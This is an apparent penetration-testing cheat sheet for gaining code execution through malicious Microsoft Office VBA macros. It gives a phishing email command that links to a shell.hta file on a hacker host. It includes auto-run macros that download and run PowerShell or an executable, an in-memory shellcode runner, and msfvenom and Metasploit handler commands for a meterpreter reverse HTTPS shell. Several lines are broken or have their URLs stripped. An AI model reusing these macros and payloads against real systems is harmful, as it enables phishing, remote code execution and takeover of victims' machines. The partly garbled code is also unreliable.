Client Side Code Execution
VBA Macro in MS Office
Send email
sendemail -f [email protected] -t [email protected] -s victim.ip -u "Subject" -m "Help: http://hacker.ip/shell.hta"Run from Web Server through Powershell In-Memory
python -m http.server 80
Sub MyMacro()
Dim str As String
((New-Object System.Net.WebClient).DownloadString(''))"
End Sub
Sub Document_Open()
MyMacro
End Sub
Sub AutoOpen()
MyMacro
End SubIn-Memory Shellcode VBA Macro without .exe
.exe/x64/ shellcode with Dim res As LongPtr for x64 modern MS Office
Workbook_Open() for Excel
sudo msfconsole -q -x "use exploit/multi/handler"
set payload windows/x64/meterpreter/reverse_https
set lhost 192.168.119.120
set lport 443
run
Private Declare PtrSafe Function Sleep Lib "KERNEL32" (ByVal mili As Long) As Long
Function MyMacro()
Dim buf As Variant
Dim addr As LongPtr
Dim counter As Long
Dim data As Long
Dim res As Long
data = buf(counter)
res = RtlMoveMemory(addr + counter, data, 1)
Next counter
End Function
Sub Document_Open()
MyMacro
End Sub
Sub AutoOpen()
MyMacro
End Sub
VBA .exe Shellcode Download & Execute on Disk
.exe Shellcode Download & Execute on Diskmsfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.119.120 LPORT=443 -f exe -o msfstaged.exesudo msfconsole -q -x "use exploit/multi/handler"
set payload windows/x64/meterpreter/reverse_https
set lhost 192.168.119.120
set lport 443
runpython -m http.server 80Sub Document_Open()
MyMacro
End Sub
Sub AutoOpen()
MyMacro
End Sub
Sub MyMacro()
Dim str As String
str = "powershell (New-Object System.Net.WebClient).DownloadFile('/', 'msfstaged.exe')"
Shell str, vbHide
Dim exePath As String
exePath = ActiveDocument.Path + "\msfstaged.exe"
Wait (2)
End Sub
Sub Wait(n As Long)
Dim t As Date
t = Now
Do
DoEvents
Loop Until Now >= DateAdd("s", n, t)
End SubSub MyMacro()
Dim str As String
str = "powershell -c "IWR -Uri -OutFile msfstaged.exe"
Shell str, vbHide
Dim exePath As String
exePath = "C:\temp\msfstaged.exe"
Wait (2)
End SubLast updated